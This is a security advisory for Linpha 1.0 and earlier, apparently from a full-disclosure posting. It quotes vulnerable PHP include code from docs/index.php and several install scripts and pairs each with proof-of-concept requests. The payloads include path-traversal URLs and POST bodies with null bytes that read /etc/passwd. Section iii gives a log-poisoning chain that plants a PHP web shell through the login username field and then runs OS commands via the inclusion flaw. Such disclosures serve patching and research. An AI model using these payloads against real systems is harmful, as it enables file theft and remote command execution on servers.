------------- Linpha <= 1.0 multiple arbitrary local inclusion -----------------
i)
vulnerable code in docs/index.php at lines 28 - 41:
…
if(isset($_GET['lang'])) // come from install pages
{
$include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
include_once(TOP_DIR.'/functions/db_api.php');
$include_lang = get_language();
}
else
{
$include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
…
well, you can include an arbitrary php file from local resources, poc:
http://[target]/[host]/docs/index.php?lang=/…/…/…/…/…/…/…/…/…/…/test
and, if magic_quotes_gpc = Off, any file:
http://[target]/[host]/docs/index.php?lang=/…/…/…/…/…/…/…/…/…/…/etc/passwd%00
ii) install directory is not removed after installation, you cannot use files to
modify settings but we have arbitrary local inclusion issues in several files:
--------------------------------------------------------------------------
ii.a) vulnerable code in install/install.php at lines 26-36:
…
if (@$_GET['language']) {
$lang=$_GET['language'];
} else if (@$_POST['language']) {
$lang=$_POST['language'];
} else if ($http_accept_lang) {
$lang = $http_accept_lang;
} else {
$lang="English";
}
include_once(TOP_DIR.'/lang/lang.'.$lang.'.php');
…
poc:
http://[target]/[path]/install/install.php?language=/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
http://[target]/[path]/install/install.php?language=/…/…/sql/tmp/linpha.log%00
--------------------------------------------------------------------------
ii.b) vulnerable code in install/sec_stage_install.php at lines 22-31:
…
switch($_GET['whatlang'])
{
case 1:
include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
break;
default:
include_once(TOP_DIR.'/lang/lang.English.php');
break;
}
…
poc:
http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/…/…/…/…/…/…/…/etc/passwd%00
--------------------------------------------------------------------------
ii.c) vulnerable code in install/third_stage_install.php at line 22:
…
include_once(TOP_DIR.'/lang/lang.'.$_GET['language'].'.php');
…
poc:
http://[target]/[path]/install/sec_stage_install.php?language=/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
http://[target]/[path]/install/sec_stage_install.php?language=/…/…/…/…/…/…/…/etc/passwd%00
--------------------------------------------------------------------------
ii.d) vulnerable code in install/forth_stage_install.php at line 22:
…
include_once(TOP_DIR.'/lang/lang.'.$_POST['language'].'.php');
…
poc:
POST [path]install/forth_stage_install.php HTTP/1.1\r\n";
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close
language=/…/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
POST [path]install/forth_stage_install.php HTTP/1.1\r\n";
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: Sun-Tzu
Connection: Close
language=/…/…/…/…/…/…/…/…/etc/passwd%00
iii) if "user login events log" is set to "file" in Linpha administration
(not the default) a remote user can inject arbitrary code in sql/tmp/linpha.log
poc: try to login with username: <?php system($_GET[cmd]);?>
and password: [whatever]
now in sql/tmp/linpha.log we have something like this:
USER | ERROR | 20060211 035519 | 192.168.1.5 | User <?php system($_GET[cmd]);?>: login failed!
now, if magic_quotes_gpc = Off on target system, you can launch operating system
commands, poc:
http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/…/…/sql/tmp/linpha.log%00
(same technique with install dir scripts…)
rgod